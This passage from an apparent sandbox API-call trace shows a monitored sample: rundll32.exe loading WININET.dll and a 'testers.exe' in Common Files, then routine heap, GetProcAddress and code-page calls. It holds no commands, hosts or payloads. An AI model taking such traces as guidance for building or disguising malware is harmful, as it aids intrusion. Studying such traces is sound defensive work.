hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8cc8 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfe518 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf8638 | out: hHeap=0xbe0000) returned 1 [0250.914] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5720 | out: hHeap=0xbe0000) returned 1 [0250.918] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0250.921] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0250.921] OleUninitialize () [0250.923] DestroyCursor (hCursor=0x3017b) returned 0 Thread: id = 229 os_tid = 0x5bc Thread: id = 230 os_tid = 0x734 Thread: id = 231 os_tid = 0x230 Thread: id = 232 os_tid = 0x744 Thread: id = 234 os_tid = 0x224 Thread: id = 235 os_tid = 0x550 Thread: id = 237 os_tid = 0x288 Thread: id = 238 os_tid = 0x3fc Thread: id = 247 os_tid = 0x754 Process: id = "34" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x659c6000" os_pid = "0x6b0" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x530" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 233 os_tid = 0x7bc Thread: id = 236 os_tid = 0x24c Thread: id = 239 os_tid = 0x7fc Thread: id = 240 os_tid = 0x438 Thread: id = 241 os_tid = 0x2b0 Thread: id = 242 os_tid = 0x7c8 Process: id = "35" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x63dd5000" os_pid = "0x778" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x530" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 249 os_tid = 0x2ac [0251.219] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x89fc20 | out: lpSystemTimeAsFileTime=0x89fc20*(dwLowDateTime=0x3748b280, dwHighDateTime=0x1d661be)) [0251.219] GetCurrentThreadId () returned 0x2ac [0251.219] GetCurrentProcessId () returned 0x778 [0251.219] QueryPerformanceCounter (in: lpPerformanceCount=0x89fc18 | out: lpPerformanceCount=0x89fc18*=18174524984) returned 1 [0251.250] GetStartupInfoW (in: lpStartupInfo=0x89fbb0 | out: lpStartupInfo=0x89fbb0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0251.250] GetProcessHeap () returned 0xc60000 [0251.253] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0251.253] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0251.253] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0251.254] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0251.254] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0251.254] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0251.256] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0251.256] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0251.256] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0251.256] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0251.256] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0251.256] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0251.257] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0251.257] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0251.257] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0251.257] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0251.257] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0251.257] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0251.258] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0251.259] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0251.260] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3bc) returned 0xc81f08 [0251.260] GetCurrentThreadId () returned 0x2ac [0251.260] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xc72a08 [0251.261] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x800) returned 0xc822d0 [0251.261] GetStartupInfoW (in: lpStartupInfo=0x89fb80 | out: lpStartupInfo=0x89fb80*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0xdd7ef1a, hStdError=0x0)) [0251.261] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0251.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0251.261] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0251.261] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0251.261] GetEnvironmentStringsW () returned 0xc82ad8* [0251.261] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xaca) returned 0xc835b0 [0251.261] FreeEnvironmentStringsW (penv=0xc82ad8) returned 1 [0251.261] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0251.261] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4a) returned 0xc72a28 [0251.261] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x98) returned 0xc82ad8 [0251.261] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3e) returned 0xc72120 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x6c) returned 0xc82b78 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x6e) returned 0xc82bf0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x78) returned 0xc6f860 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x62) returned 0xc82c68 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2e) returned 0xc7c588 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x48) returned 0xc781a0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x28) returned 0xc7bfe0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x1a) returned 0xc7fb20 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x4a) returned 0xc82cd8 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x72) returned 0xc6f8e0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x30) returned 0xc7c5c0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2e) returned 0xc7c5f8 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x1c) returned 0xc7fb48 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0xd2) returned 0xc82d30 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x7c) returned 0xc82e10 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x36) returned 0xc82e98 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3a) returned 0xc72168 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x90) returned 0xc82ed8 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x24) returned 0xc7c010 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x30) returned 0xc7c630 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x36) returned 0xc82f70 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x48) returned 0xc781f0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x52) returned 0xc82fb0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3c) returned 0xc721b0 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x82) returned 0xc83010 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2e) returned 0xc7c668 [0251.262] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x1e) returned 0xc7fb70 [0251.263] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2c) returned 0xc7c6a0 [0251.263] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x54) returned 0xc840a0 [0251.263] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x52) returned 0xc84100 [0251.263] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2a) returned 0xc7c6d8 [0251.263] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3c) returned 0xc721f8 [0251.263] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x54) returned 0xc84160 [0251.264] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x24) returned 0xc7c040 [0251.264] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x30) returned 0xc7c710 [0251.264] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x8c) returned 0xc830a0 [0251.264] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc835b0 | out: hHeap=0xc60000) returned 1 [0251.265] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x80) returned 0xc83138 [0251.266] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x800) returned 0xc831c0 [0251.266] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0251.266] GetLastError () returned 0x0 [0251.266] SetLastError (dwErrCode=0x0) [0251.266] GetLastError () returned 0x0 [0251.266] SetLastError (dwErrCode=0x0) [0251.266] GetLastError () returned 0x0 [0251.266] SetLastError (dwErrCode=0x0) [0251.266] GetACP () returned 0x4e4 [0251.266] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x220) returned 0xc839c8 [0251.266] GetLastError () returned 0x0 [0251.266] SetLastError (dwErrCode=0x0) [0251.266] IsValidCodePage (CodePage=0x4e4) returned 1 [0251.266] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x89fb74 | out: lpCPInfo=0x89fb74) returned 1 [0251.266] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x89f63c | out: lpCPInfo=0x89f63c) returned 1 [0251.266] GetLastError () returned 0x0 [0251.266] SetLastError (dwErrCode=0x0) [0251.266] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fa50, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fa50, cbMultiByte=256, lpWideCharStr=0x89f3b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0251.267] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x89f650 | out: lpCharType=0x89f650) returned 1 [0251.267] GetLastError () returned 0x0 [0251.267] SetLastError (dwErrCode=0x0) [0251.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fa50, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fa50, cbMultiByte=256, lpWideCharStr=0x89f388, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0251.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x89f178, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0251.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x89f950, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿªï×\r\x8cû\x89", lpUsedDefaultChar=0x0) returned 256 [0251.267] GetLastError () returned 0x0 [0251.267] SetLastError (dwErrCode=0x0) [0251.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fa50, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0251.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x89fa50, cbMultiByte=256, lpWideCharStr=0x89f3a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0251.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0251.267] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x89f198, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0251.267] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x89f850, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 